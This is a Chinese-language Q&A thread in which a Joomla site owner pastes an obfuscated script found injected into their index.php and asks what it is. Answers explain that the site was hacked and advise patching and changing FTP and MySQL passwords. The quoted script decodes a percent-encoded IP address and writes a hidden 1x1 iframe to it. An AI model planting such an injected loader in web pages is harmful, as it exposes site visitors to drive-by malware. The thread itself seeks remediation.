我已经看到,这发生了两次,在我的根index.php文件中。 我添加了这个东西
<html><body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5='1'vxoq5='1'>";str = str.replace('vde', 'i');str =str.replace('pog', 'fr');str = str.replace('nbt', 'ame');str =str.replace('Oaoz5', 'width');str =str.replace('vxoq5','height');document.write(str);</script></body></html>
有谁知道那是什么以及它是怎么来的。
当我试图在谷歌浏览器中打开我的网站时,它告诉我一些恶意软件试图从有害网站运行,你是否想允许它。
如果删除该脚本,那么一切正常
但是在两周内两次这样做了
那是病毒吗?怎样才能解决我的代码我正在使用JOOMLA
答案 0 :(得分:0)
您的网站遭到黑客入侵。您需要确保将Joomla安装,其所有插件以及服务器上的所有其他软件修补到最新版本。如果它是共享服务器,您的主机可能会提供帮助。否则,请查阅服务器日志。
答案 1 :(得分:0)
你被黑了。您应该更改FTP和MYSQL密码,升级到最新版本的Joomla(目前为1.5.18)并检查所有组件和插件是否存在此列表中的漏洞http://docs.joomla.org/Vulnerable_Extensions_List